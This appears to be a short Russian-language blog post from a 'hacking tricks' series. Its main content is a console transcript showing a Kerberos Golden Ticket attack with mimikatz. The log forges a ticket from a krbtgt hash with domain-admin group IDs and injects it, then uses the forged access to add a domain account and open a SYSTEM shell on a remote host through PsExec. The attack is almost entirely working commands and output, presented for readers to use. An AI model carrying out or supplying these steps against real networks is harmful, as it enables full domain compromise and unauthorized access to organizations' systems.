C:\Temp>whoami /USER
USER INFORMATION
----------------
User Name SID
=============== =============================================
test\domainuser S-1-5-21-3838653977-3010990090-570996099-1122
C:\Temp>PsExec.exe \\WIN-8D3KWV0CV4T.TEST.LOCAL -s cmd
PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
Couldn't access WIN-8D3KWV0CV4T.TEST.LOCAL:
Access is denied.
C:\Temp>net user newuser newpassword /add /domain
The request will be processed at a domain controller for domain test.local.
System error 5 has occurred.
Access is denied.
C:\Temp>mimikatz
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Mar 17 2014 22:27:23)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 14 modules * * */
mimikatz # kerberos::golden /admin:Guest /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:ticket.krb /id:500 /groups:513,512,520,518,519
Admin : Guest
Domain : TEST.LOCAL
SID : S-1-5-21-3838653977-3010990090-570996099
User Id : 500
Groups Id : *513 512 520 518 519
krbtgt : c1e209654807223d8cb17376fcb70e53
-> Ticket : ticket.krb
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz # kerberos::ptt ticket.krb
Ticket 'ticket.krb' successfully submitted for current session
mimikatz # exit
Bye!
C:\Temp>net user newuser newpassword /add /domain
The request will be processed at a domain controller for domain test.local.
The command completed successfully.
C:\Temp>PsExec.exe \\WIN-8D3KWV0CV4T.TEST.LOCAL -s cmd
PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [‚ҐабЁп 6.0.6001]
(C) Љ®аЇ®а жЁп Њ ©Єа®б®дв, 2006. ‚ᥠЇа ў § йЁйҐл.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
[hacking tricks] Mimikatz Golden Ticket
Данная рубрика будет кратко освещать практические примеры реализации тех или иных атак без утомительно долгих вступлений о природе и погоде. Только суть. И в качестве первой заметки под этим тегом речь вновь зайдет о создании Golden Ticket. Так получилось, что Benjamin буквально на днях добавил кусок кода, отвечающий за идентификатор пользователя и список групп, участником которых становится счастливый обладатель золотого билета Kerberos. Этим и предлагаю пользоваться!
Mimikatz Golden Ticket
в загашник Well-Known SID Structures http://msdn.microsoft.com/en-us/library/cc980032.aspx
ОтветитьУдалить